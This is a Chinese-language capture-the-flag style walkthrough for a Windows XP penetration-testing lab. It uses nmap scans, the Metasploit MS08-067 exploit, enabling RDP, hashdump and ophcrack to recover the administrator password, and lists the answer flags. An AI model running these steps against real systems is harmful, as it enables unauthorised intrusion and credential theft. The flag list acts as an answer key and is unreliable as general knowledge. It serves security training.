任务实施:
E120-经典赛题-Windows操作系统渗透测试
任务环境说明:
服务器场景:p9_kali-7(用户名:root;密码:toor)
服务器场景操作系统:Kali Linux 192.168.1.102
服务器场景:p9_xp-2(用户名:administrator;密码:pan123yun456)
服务器场景操作系统:Windows(版本不详) 192.168.1.108
网络拓扑
操作过程
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行操作系统扫描渗透测试,并将该操作显示结果“Running:”之后的字符串作为FLAG提交;
nmmap -O 192.168.1.108
根据回显结果显示,提交Running后面的字符串Microsoft Windows XP|2003
本题提交Flag:【 Microsoft Windows XP|2003 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为FLAG提交;
nmap -sV 192.168.1.108
本题提交Flag:【 Microsoft Windows XP Microsoft-ds 】
使用命令msfconsole启动metasplopit渗透测试平台
然后在交互界面使用命令
search ms08_067搜索smb漏洞利用模块
使用命令use exploit/windows/smb/ms08_067对该模块进行调用,然后使用命令show options查看需要配置的参数
成功获取到靶机的shell
使用命令run getgui -e或run post/windows/manage/enable_rdp模块启动目标靶机的远程桌面服务。
run getgui -e ##适用于老版本kali
或
run post/windows/manage/enable_rdp ##适用于新版本kali
然后使用命令hashdump导出当前管理员用户的NTLM hash值
hashdump
复制Administrator管理员的那一行,再然后打开一个新的窗口使用命令ophcrack运行hash密码破解软件:
稍等半分钟,成功解密管理员的明文密码pan123yun456
回到命令终端,使用命令rdesktop 172.16.1.12 运行远程桌面,输入用户名Administrator密码pan123yun456
rdesktop 192.168.1.108
成功进入桌面
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景网络连接信息中的DNS信息作为FLAG提交;(例如114.114.114.114)
ipconfig /all
或
本题提交Flag:【 123.125.81.6 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为FLAG提交;
文件名称为ksxwob.docx
本题提交Flag:【 ksxwob.docx 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为FLAG提交;
本题提交Flag:【 ytgzksel 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为FLAG提交;
本题提交Flag:【 eternity 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理员的密码作为FLAG提交;
管理员的密码:pan123yun456
本题提交Flag:【 pan123yun456 】
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
本题提交Flag:【 ncuiwerx 】
实验结束,关闭虚拟机。